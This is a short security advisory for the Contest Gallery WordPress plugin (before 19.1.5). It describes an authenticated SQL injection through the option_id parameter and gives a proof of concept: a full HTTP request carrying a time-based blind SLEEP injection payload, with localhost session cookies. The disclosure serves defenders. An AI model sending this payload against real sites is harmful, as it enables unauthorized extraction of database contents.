Contest Gallery < 19.1.5 - Author+ SQL Injection

The plugins do not escape the option_id POST parameter before concatenating it to an SQL query in edit-options.php. This may allow malicious users with at least author privilege to leak sensitive information from the site’s database.

PoC

POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&edit;_options=true&option;_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(2*3)))UrUZ) HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------20111157931082033094578071609 Content-Length: 355 Origin: http://localhost:8080 Connection: close Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668486148%7Ciue1BpD8DyhKzm4LMQskkHLzsz4TbknZXcqQlgI1eeS%7C62265def59372d372b5ba459780bd8c14c8b84a253c9fc70dd3de66ae361507f; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668486148%7Ciue1BpD8DyhKzm4LMQskkHLzsz4TbknZXcqQlgI1eeS%7C69c36f6ff952f3fc1a71c3dd81a707bc4ef0760f84d7c605b77639d98644b5d5; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668313348 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------20111157931082033094578071609 Content-Disposition: form-data; name=“action” post_contest_gallery_action_ajax -----------------------------20111157931082033094578071609 Content-Disposition: form-data; name=“cgBackendHash” e12e8782da8ac6c4f1725d81a9811524 -----------------------------20111157931082033094578071609–